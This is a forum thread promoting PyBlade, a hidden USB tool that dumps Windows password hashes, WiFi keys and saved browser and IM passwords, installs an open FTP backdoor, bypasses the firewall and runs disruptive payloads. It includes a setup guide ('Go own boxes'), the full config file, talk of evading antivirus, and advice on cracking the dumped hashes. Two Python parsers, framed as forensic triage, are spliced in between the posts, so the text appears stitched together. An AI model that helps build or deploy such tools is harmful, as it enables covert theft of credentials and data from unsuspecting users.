Pyblade


sablefoxx


PyBlade v0.3



About:
Some people have been asking for an updated switchblade to run on Vista/7 computers, so I thought I'd throw something together. It's a work in progress; I'm also fairly new to Python, so no making fun of my code :D Please download and report bugs or request features!

Current Abilities:
-Gathers system info, running processes, and local IP settings
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
-Keyboard Randomizer payload
-Landmine payload
-Emo Computer payload
-Rick Roll payload
-IE Homepage payload
-Save logs in .txt, .html, or .xml format
-U3 support via .u3p file
-Support for file slurping
-FTP backdoor installer (w/ XP Firewall bypass)


Planned Updates:

-Netcat backdoor installer
-AV Bypass / Evade
-Save all logs in .html / .xml format

Downloads:
PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bf
PyBlade Source Code v0.3 (Includes payloads' source code)
U3 Support (.u3p) *BETA*

*** Change Log ***

v0.1
-Gathers system info, running processes, and network connections
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)


v0.2
-Added Keyboard Randomizer payload
-Added Landmine payload
-Added Change IE homepage payload
-Added comments to code
-Changed sysinfo to collect local IP settings
-Added options to save logs as .txt, .html, or .xml
-Added U3 support
-Checks to see if Firefox is installed before dumping passwords


v0.3
-Added Emo Computer payload (harmless, don't worry)
-Added Random Rick Roll payload
-Added support for file slurping
-Added icons for .exe's
-Added FTP Server backdoor
-Correctly sets file extensions when saving logs in .html/.xml
-Added ability to bypass XP Firewall, and hide exceptions from the GUI
-Added time stamps to log directories



*** Quick Setup Guide ***


Setup for Non-U3 Drives:
0. Obtain a USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract, then copy the contents of PyBlade.rar to the root of your USB drive
3. Edit blade.conf to do your bidding (see below)
4. Go own boxes

Setup for Unmodified U3 Drives:
0. Obtain a U3 USB drive, and put on an album
1. Download latest version of PyBlade
2. Extract, then copy the contents of PyBlade.rar to the root of the flash partition on the U3 drive
3. Edit blade.conf to do your bidding (see below)
4. Download F_Bex.u3p (see above)
5. Open the U3 menu, click "Add Programs" and "Install from My Computer"
6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted
7. Go own boxes

Configure Your Blade:
1. Open "blade.conf" in your favorite text editor (or notepad)
2. Enable/Disable programs by changing their execute value (Enable = 1)
Here are the default settings for v0.3:
# --------------------------------
#  SwitchBlade Configuration File
# --------------------------------

# Log File Type
#   Possible values; text, html, xml
log=html

# System Dumps
sysinfo=1
pwdump=1
wifi=1
mspass=1
iepw=1
iehist=1
ffpw=1
chromepw=1

# Payloads
keyrand=0
landmine=0
rickroll=0
emo=0

# Change IE Homepage
iehome=0
iehome_url=http://google.com

# Backdoors
ftpme=0


# File Slurping
#   Separate multiple directories using ;'s
slurp=0
slurp_dirs=C:\Files;C:\Files2


Note that lines starting with '#' are comments and are ignored during execution. Do NOT comment out lines to disable programs; just set their execute value to 0.

3. Some lines contain strings:
log= Change this to set how the log files are saved (.log, .html, .xml)
iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.
slurp_dirs= This is a list of the directories you want copied onto your drive; you can list multiple directories by separating them with semicolons.
4. To manually execute run "bex.exe"

Payloads:
Keyboard Randomizer: This program randomizes all keyboard input while it's running (keyrand).
Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine).
Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo).
FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme).
Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).
Note: All payloads are activated on reboot (except for FTPme).


Let me know if you find bugs, and come say hi on IRC!
Edited by sablefoxx
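As an added example (not PyBlade's own code), here is a small parser for the blade.conf format shown above, written for the case where a drive carrying PyBlade turns up and you need to know what it was configured to do. The sample config is constructed from the v0.3 defaults with one line commented out; the parser reports that key as absent rather than disabled, which is the distinction the note above about '#' lines is making.

```python
# Parse a PyBlade blade.conf and summarise what it enables.
# Added example, not PyBlade's own code. SAMPLE_CONF is constructed from the
# v0.3 defaults; 'pwdump' is commented out to show it becomes absent, not 0.
from __future__ import annotations

SAMPLE_CONF = """\
# Log File Type
#   Possible values; text, html, xml
log=html
# System Dumps
sysinfo=1
#pwdump=1
wifi=1
# Payloads
keyrand=0
landmine=1
# Change IE Homepage
iehome=0
iehome_url=http://google.com
# File Slurping
slurp=1
slurp_dirs=C:\\Files;C:\\Files2
"""

DUMPS = ("sysinfo", "pwdump", "wifi", "mspass", "iepw", "iehist", "ffpw", "chromepw")
PAYLOADS = ("keyrand", "landmine", "rickroll", "emo", "iehome", "ftpme", "slurp")
LOG_TYPES = ("text", "html", "xml")


def parse_conf(text: str) -> dict[str, str]:
    """Return key->value pairs; blank lines and '#' lines are skipped, as the post says."""
    conf: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:  # lines without '=' carry no setting
            conf[key.strip()] = value.strip()
    return conf


def summarise(conf: dict[str, str]) -> dict:
    """List enabled modules, keys missing from the file, and slurp targets."""
    enabled = [k for k in DUMPS + PAYLOADS if conf.get(k) == "1"]
    missing = [k for k in DUMPS + PAYLOADS if k not in conf]  # commented out != 0
    slurp_on = conf.get("slurp") == "1"
    slurp_dirs = [d for d in conf.get("slurp_dirs", "").split(";") if d] if slurp_on else []
    log = conf.get("log", "")
    return {"enabled": enabled, "missing": missing, "slurp_dirs": slurp_dirs,
            "log": log, "log_ok": log in LOG_TYPES,
            "iehome_url": conf.get("iehome_url") if conf.get("iehome") == "1" else None}
```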


Whoops, forgot a file; you may want to re-download it. Also just found a couple of bugs, working on fixes.

Edit --Fixed problems!

Edited by sablefoxx

I thought it stopped things from autorunning with .inf?

It should still work on XP, I'm working on getting the new .lnk icon exploit to run it on unpatched Vista/Seven computers, and U3 support.

Edited by sablefoxx

Updated to v0.2, added payloads, and some other small stuff.

Pretty cool, needs an AV killer or something; most AVs destroy it before it gets a chance to do anything useful.

Hmm... I have yet to see this done well, perhaps I'll try something.

I could easily add an encrypted .rar where the files in question could be stored until after the AV has been killed or disabled.

"bex.exe" shouldn't be flagged on VirusTotal.

The problem is that killing AV software isn't as simple as making a taskkill system call, but perhaps we can disable it or crash it (without crashing the OS). The problem with this method is that we can only target specific titles.

Edited by sablefoxx

Sorry for my noobness, but can you make a tutorial on how to use these scripts? And how to make it work with a U3 flash drive? Thanks, and I do apologize for my ignorance on this awesome software. Thanks. Good job, Batman.

I'll throw something together, brb.


I noticed you removed the .lnk icon exploit from your planned features. Is it impossible to implement?

More difficult than originally anticipated, may add it later.


Just tried it on a Vista machine. I had to disable AVG security because it was being a pain. Everything seems to be working great. Didn't get any passwords though, because I guess the user didn't save them. I'm gonna have to try it on another computer. Is there any way it can get the Windows login password too?


Yeap, the 'pwdump' log file contains the login password hashes; you'll need to crack them using a program like ophcrack.


This is what's in my pwdump log file. Is there something wrong here? Because the machine does have a login password. I know the password, but why won't it dump it? Or is this what it's supposed to look like, and I have to crack it with that program?

Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::

Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

VM:1000:NO PASSWORD*********************:NO PASSWORD*********************:::

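As an added example (not part of PyBlade or pwdump), here is a triage parser for pwdump-format output like the three lines posted above, the kind of thing you want when a switchblade log directory is recovered and you need to know whether it actually captured any credential material. Each line is user:RID:LM-hash:NT-hash:::; the 'NO PASSWORD' placeholder means pwdump emitted no hash value for that field, and the two well-known empty-password hash constants are recognised separately. The fourth sample record and its NT hash are constructed dummies.

```python
# Triage a pwdump-format log like the one posted above. Added example, not
# part of PyBlade or pwdump. Line format: user:RID:LM-hash:NT-hash:::, and
# pwdump writes 'NO PASSWORD*********************' when it has no hash value.
import re

PLACEHOLDER = "NO PASSWORD*********************"
# Well-known hashes of the empty password; a 32-hex field equal to one of
# these means the account has no password set rather than a crackable one.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed sample: the three lines from the post plus one record with a
# dummy (not real) NT hash, and one junk line to exercise the rejection path.
SAMPLE_LOG = """\
Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
VM:1000:NO PASSWORD*********************:NO PASSWORD*********************:::
lab:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
this line is not pwdump output
"""


def classify(field: str) -> str:
    """'none' for the placeholder, 'empty' for an empty-password hash, 'hash' otherwise."""
    if field == PLACEHOLDER:
        return "none"
    if not HEX32.match(field):
        raise ValueError(f"malformed hash field: {field!r}")
    return "empty" if field.lower() in (EMPTY_LM, EMPTY_NT) else "hash"


def parse_pwdump(text: str) -> tuple[list[dict], list[str]]:
    """Return (records, rejected_lines); malformed lines are rejected, never guessed."""
    records, rejected = [], []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[1].isdigit():
            rejected.append(line)
            continue
        try:
            records.append({"user": parts[0], "rid": int(parts[1]),
                            "lm": classify(parts[2]), "nt": classify(parts[3])})
        except ValueError:
            rejected.append(line)
    return records, rejected


def accounts_with_hashes(records: list[dict]) -> list[str]:
    """Users whose NT field is a real hash, i.e. the dump captured credential material."""
    return [r["user"] for r in records if r["nt"] == "hash"]
```

Run against the posted log alone, accounts_with_hashes() returns an empty list: every field is the placeholder, so that dump holds nothing to crack.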
